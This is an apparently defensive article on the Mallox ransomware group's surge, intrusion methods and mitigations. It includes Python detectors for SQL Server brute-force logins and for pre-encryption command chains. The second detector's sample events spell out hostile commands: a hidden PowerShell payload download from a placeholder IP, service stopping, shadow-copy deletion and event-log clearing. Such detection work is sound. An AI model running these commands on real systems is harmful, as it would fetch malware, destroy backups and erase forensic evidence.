The Surge of Mallox Ransomware Group: Analyzing their Increased Activity

Ransomware Group Mallox Rapidly Expanding and Poses Major Threat

Surge in Mallox Activity

A ransomware group known as Mallox, also tracked as TargetCompany, Fargo, and Tohnichi, has recently emerged as a major cyber threat. The group first appeared in June 2021 and claims to have infected numerous organizations worldwide since then. Mallox has targeted a range of sectors, including manufacturing, retail, wholesale, legal, and professional services. Its activity has surged significantly in the past few months, leading experts to believe that Mallox is on track to become an even bigger threat.

According to researchers at Palo Alto Networks’ Unit 42 threat intelligence team, Mallox-related activity has increased by a staggering 174% compared to the previous year. This surge can be attributed to the group’s concerted effort to expand its operations by recruiting affiliates. Lior Rochberger, a senior security researcher at Palo Alto Networks, notes that this recruitment push was particularly visible around May this year.

Infiltration Tactics

Mallox primarily gains initial access to enterprise networks by targeting exposed and poorly secured SQL servers. The group frequently brute-forces SQL Server accounts using lists of commonly used or default passwords. Researchers have also identified two remote code execution vulnerabilities in SQL Server that Mallox exploits: CVE-2020-0618 and CVE-2019-1068. While SQL servers remain the primary infiltration route, there have been reports of Mallox attempting to distribute its malware through phishing emails, indicating the involvement of new affiliate groups.
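The brute-force stage described above leaves a recognisable trail in the SQL Server error log: a burst of failed logins from one client, sometimes followed by a success. The following detector is an added example written for this article, not code from Unit 42 or from any vendor; the log lines are constructed to mimic the ERRORLOG format, and the threshold and window are illustrative assumptions to tune per environment.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed SQL Server ERRORLOG-style lines (sample data, not taken from any real incident).
SAMPLE_LOG = """\
2023-07-20 02:14:01.11 Logon  Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.5]
2023-07-20 02:14:01.52 Logon  Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.5]
2023-07-20 02:14:02.03 Logon  Login failed for user 'admin'. Reason: Could not find a login matching the name provided. [CLIENT: 203.0.113.5]
2023-07-20 02:14:02.40 Logon  Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.5]
2023-07-20 02:14:03.10 Logon  Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.5]
2023-07-20 02:14:03.55 Logon  Login succeeded for user 'sa'. Connection made using SQL Server authentication. [CLIENT: 203.0.113.5]
2023-07-20 02:20:00.00 Logon  Login failed for user 'alice'. Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.7]
"""

LINE_RE = re.compile(r"^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d)\.\d+\s+Logon\s+Login (?P<result>failed|succeeded) "
                     r"for user '(?P<user>[^']+)'.*\[CLIENT: (?P<client>[^\]]+)\]")

def parse(log_text):
    """Turn matching ERRORLOG lines into event dicts; lines that are not logon events are ignored."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            e = m.groupdict()
            e["ts"] = datetime.strptime(e["ts"], "%Y-%m-%d %H:%M:%S")
            events.append(e)
    return events

def detect_brute_force(events, threshold=4, window=timedelta(minutes=5)):
    """Flag each client with >= threshold failed logins inside any `window`, and note whether
    a successful login from that client followed the burst (a guessed password, not just noise)."""
    by_client = defaultdict(list)
    for e in sorted(events, key=lambda e: e["ts"]):
        by_client[e["client"]].append(e)
    findings = {}
    for client, evs in by_client.items():
        fails = [e for e in evs if e["result"] == "failed"]
        for i, first in enumerate(fails):
            burst = [f for f in fails[i:] if f["ts"] - first["ts"] <= window]
            if len(burst) >= threshold:
                last_ts = burst[-1]["ts"]
                findings[client] = {
                    "failures": len(burst),
                    "users": sorted({f["user"] for f in burst}),
                    "success_after": any(e["result"] == "succeeded" and e["ts"] >= last_ts for e in evs),
                }
                break
    return findings
```

A finding with `success_after` set is the one to escalate first, since it means the guessing worked; the single failure from 10.0.0.7 stays below the threshold and is not reported.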

Once inside the network, Mallox uses the command line and PowerShell to download its ransomware payload from a remote server. The payload then disables services that could interfere with encryption, attempts to delete volume shadow copies to complicate recovery, and clears event logs to hinder forensic analysis. Mallox follows the double-extortion model: it steals data before encrypting it and operates a leak site where data from victims who refuse to pay is published. Negotiations with Mallox operators take place on a Tor website, with each victim authenticated by a unique private key.
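Each of the post-access steps above (payload download via PowerShell, service tampering, shadow copy deletion, event log clearing) is noisy on its own, but several of them on one host within minutes is a strong pre-encryption signal. The correlation below is an added example for this article, not detection content from Unit 42 or any vendor; the process-creation records are constructed in a simplified Sysmon-style shape, and the rule patterns, window and stage count are assumptions to adapt to your telemetry.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed process-creation records in a simplified Sysmon-Event-1 shape (sample data, not a real capture).
SAMPLE_EVENTS = [
    {"ts": "2023-07-20T02:15:10", "host": "sql01", "parent": "sqlservr.exe", "image": "cmd.exe",
     "cmd": "cmd.exe /c powershell -w hidden -c \"Invoke-WebRequest http://203.0.113.9/x -OutFile C:\\Users\\Public\\x.exe\""},
    {"ts": "2023-07-20T02:15:40", "host": "sql01", "parent": "x.exe", "image": "net.exe", "cmd": "net stop MSSQLSERVER /y"},
    {"ts": "2023-07-20T02:15:42", "host": "sql01", "parent": "x.exe", "image": "vssadmin.exe", "cmd": "vssadmin.exe delete shadows /all /quiet"},
    {"ts": "2023-07-20T02:15:45", "host": "sql01", "parent": "x.exe", "image": "wevtutil.exe", "cmd": "wevtutil.exe cl Security"},
    {"ts": "2023-07-20T09:00:00", "host": "ws07", "parent": "explorer.exe", "image": "wevtutil.exe", "cmd": "wevtutil.exe qe Application /c:5"},
    {"ts": "2023-07-20T09:30:00", "host": "ws07", "parent": "explorer.exe", "image": "vssadmin.exe", "cmd": "vssadmin.exe list shadows"},
]

# One regex per stage the article describes; each alone is noisy, the combination on one host is not.
RULES = [
    ("payload_download", re.compile(r"powershell.*(downloadstring|downloadfile|invoke-webrequest|\biwr\b|-enc\b)", re.I)),
    ("service_tamper", re.compile(r"\b(net1?(\.exe)?\s+stop|sc(\.exe)?\s+(stop|config))\b", re.I)),
    ("shadow_copy_delete", re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows|wmic(\.exe)?\s+shadowcopy\s+delete", re.I)),
    ("eventlog_clear", re.compile(r"wevtutil(\.exe)?\s+cl\b|clear-eventlog", re.I)),
]

def classify(event):
    """Return the names of every stage rule whose pattern matches this event's command line."""
    return [name for name, pat in RULES if pat.search(event["cmd"])]

def detect_chain(events, window=timedelta(minutes=10), min_stages=3):
    """Per host, collect stage hits in time order; a host showing >= min_stages distinct stages
    within `window` is reported as a pre-encryption chain with the commands that triggered it."""
    hits = defaultdict(list)
    for e in sorted(events, key=lambda e: e["ts"]):
        for stage in classify(e):
            hits[e["host"]].append((datetime.fromisoformat(e["ts"]), stage, e["cmd"]))
    findings = {}
    for host, hs in hits.items():
        for i, (t0, _, _) in enumerate(hs):
            burst = [h for h in hs[i:] if h[0] - t0 <= window]
            stages = sorted({s for _, s, _ in burst})
            if len(stages) >= min_stages:
                findings[host] = {"first_seen": t0.isoformat(), "stages": stages, "commands": [c for _, _, c in burst]}
                break
    return findings
```

The benign administrative commands on ws07 (querying logs, listing shadow copies) match no stage, so only sql01 is reported, together with the command lines an analyst needs to confirm the finding.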

Ransomware Threat Landscape

While the surge in Mallox’s activity is concerning, it does not represent a new or different problem for enterprise defenders. NCC Group recently reported a 221% increase in ransomware attacks this year compared to the same period in 2022. In June 2023 alone, NCC Group identified a record 434 ransomware attacks, most of them attributed to the Cl0p ransomware group’s exploitation of the MOVEit file transfer vulnerability. The LockBit 3.0 threat actor also remained active during this period.

The Importance of Proactive Defense

In light of the growing ransomware threat landscape, it is crucial for organizations to have a multilayered defense plan in place. The Unit 42 team at Palo Alto Networks recommends ensuring that all internet-facing applications are properly configured and that systems are patched and up to date. Additionally, having endpoint security controls that perform in-memory inspection can help detect process-injection attempts, lateral movement efforts, and evasion of security controls.

Editorial: The Urgent Need for Enhanced Cybersecurity

The increasing frequency and sophistication of ransomware attacks should serve as a wake-up call for organizations to prioritize cybersecurity. The surge in Mallox’s activity demonstrates the ever-evolving nature of cyber threats and the need for robust defense measures. While patching vulnerabilities and implementing endpoint security controls is essential, organizations must go beyond reactive measures. Proactive cybersecurity strategies should include regular security assessments, employee training, and the adoption of advanced threat detection and encryption technologies.

Advice for Individuals and Organizations

1. Patch and update: Regularly update all software, including operating systems and applications, to ensure that known vulnerabilities are patched.

2. Strong passwords: Use unique and strong passwords for all accounts, especially those related to sensitive information or systems.

3. Multi-factor authentication (MFA): Enable MFA for all accounts whenever possible to add an extra layer of protection.

4. Training and awareness: Educate employees about phishing scams, social engineering tactics, and safe online practices to minimize the risk of successful attacks.

5. Backup regularly: Create and maintain secure backups of critical data to mitigate the impact of ransomware attacks.

6. Vulnerability management: Implement a comprehensive vulnerability management program to identify and address security flaws in a proactive manner.

7. Incident response plan: Develop and test an incident response plan to minimize the impact of a potential security breach.

By following these proactive measures, individuals and organizations can enhance their cybersecurity posture and better protect themselves against the growing ransomware threat.